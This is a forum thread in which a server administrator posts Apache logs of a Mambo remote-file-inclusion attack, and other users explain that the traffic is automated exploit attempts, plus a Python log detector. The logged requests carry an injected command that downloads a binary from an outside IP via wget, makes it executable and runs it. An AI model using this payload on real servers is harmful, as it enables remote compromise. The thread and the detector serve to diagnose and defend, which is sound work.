laverdir

Registered
Feb 26, 2006
I know that you cPanel guys are searching for illegal users, but 'brute force' scanning of every IP address isn't the way. An apology will be fine!

69.93.35.178 - - [26/Feb/2006:08:02:38 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 298
69.93.35.178 - - [26/Feb/2006:08:02:39 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 200 586
69.93.35.178 - - [26/Feb/2006:08:02:40 -0600] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 304
69.93.35.178 - - [26/Feb/2006:08:02:41 -0600] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 302
69.93.35.178 - - [26/Feb/2006:08:02:42 -0600] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 313
69.93.35.178 - - [26/Feb/2006:08:02:44 -0600] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 308
69.93.35.178 - - [26/Feb/2006:08:02:46 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298
69.93.35.178 - - [26/Feb/2006:08:02:47 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 303
69.93.35.178 - - [26/Feb/2006:08:02:48 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 310
69.93.35.178 - - [26/Feb/2006:08:02:50 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 311
69.93.35.178 - - [26/Feb/2006:08:02:51 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 305
69.93.35.178 - - [26/Feb/2006:08:02:52 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 311
69.93.35.178 - - [26/Feb/2006:08:02:53 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 308
69.93.35.178 - - [26/Feb/2006:08:02:55 -0600] "POST /xmlrpc.php HTTP/1.1" 404 298
69.93.35.178 - - [26/Feb/2006:08:02:56 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 305
69.93.35.178 - - [26/Feb/2006:08:02:57 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 305
 

rustelekom

Well-Known Member
PartnerNOC
Nov 13, 2003
moscow
It is the virus. Virus scan your servers for vulnerabilities.
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
Minneapolis, MN
laverdir said:
I know that you cPanel guys are searching for illegal users, but 'brute force' scanning of every IP address isn't the way. An apology will be fine!

69.93.35.178 - - [26/Feb/2006:08:02:38 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./supina;echo%20YYY;echo| HTTP/1.1" 404 298
The most important thing is securing your server.
 

laverdir

Registered
Feb 26, 2006
I don't think that is related, I have entered the IP address in my browser.

But it could be related to the famous 'DNS poisoning'.
 

dave9000

Well-Known Member
Apr 7, 2003
arkansas
cPanel Access Level
Root Administrator
It's attempts to exploit various PHP scripts. If that is the only IP you have been hit from, consider yourself lucky. We get hit an average of 5-10 times an hour with basically the same thing.

You need to secure your server like Andy said. If you're running Apache then mod_security would be a good addition.

These exploit attempts did not come from www.cpanel.net.
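
The request patterns in the log lines posted in this thread can be picked out of an Apache access log automatically. The following is an added example, not code from any poster or from cPanel: it flags query parameters that carry a remote URL, attempts to overwrite PHP globals, and one client requesting the same script under many directories. The names `analyse`, `SAMPLE` and `probe_threshold` are assumptions, and the sample lines are constructed with documentation addresses.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache common log format: client, timestamp, request line, status, size.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*) HTTP/[\d.]+" (\d{3}) \S+$')
# A parameter whose value is a remote URL (remote file inclusion indicator).
REMOTE_URL_PARAM = re.compile(r'[?&]([^=&?]+)=(?:https?|ftp)://', re.I)
# Parameter names that try to overwrite PHP superglobals.
GLOBALS_OVERWRITE = re.compile(r'[?&](?:_REQUEST\[|_GET\[|_POST\[|GLOBALS(?:=|\[))', re.I)

# Constructed sample lines (not taken from a real server).
TS = '[26/Feb/2006:08:02:38 -0600]'
Q = '?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/x.gif?'
SAMPLE = [
    f'192.0.2.10 - - {TS} "GET /index2.php{Q} HTTP/1.1" 404 298',
    f'192.0.2.10 - - {TS} "GET /mambo/index2.php{Q} HTTP/1.1" 404 304',
    f'192.0.2.10 - - {TS} "POST /xmlrpc.php HTTP/1.1" 404 298',
    f'192.0.2.10 - - {TS} "POST /blog/xmlrpc.php HTTP/1.1" 404 303',
    f'192.0.2.10 - - {TS} "POST /drupal/xmlrpc.php HTTP/1.1" 404 305',
    f'192.0.2.44 - - {TS} "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 586',
]

def analyse(lines, probe_threshold=3):
    """Return (flagged requests, clients probing one script under many paths)."""
    findings = []
    paths_by_client_script = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a common-log-format line
        client, _ts, _method, target, status = m.groups()
        decoded = unquote(target)          # undo %20 and similar before matching
        path = decoded.split('?', 1)[0]
        tags = []
        rfi = REMOTE_URL_PARAM.search(decoded)
        if rfi:
            tags.append('remote-url-in-param:' + rfi.group(1))
        if GLOBALS_OVERWRITE.search(decoded):
            tags.append('globals-overwrite')
        if tags:
            findings.append((client, path, int(status), tags))
        script = path.rsplit('/', 1)[-1]
        paths_by_client_script[(client, script)].add(path)
    probes = {k: sorted(v) for k, v in paths_by_client_script.items()
              if len(v) >= probe_threshold}
    return findings, probes
```

The status code is kept in each finding because a flagged request answered with 200 means the targeted script exists and ran, so it is the one to check first.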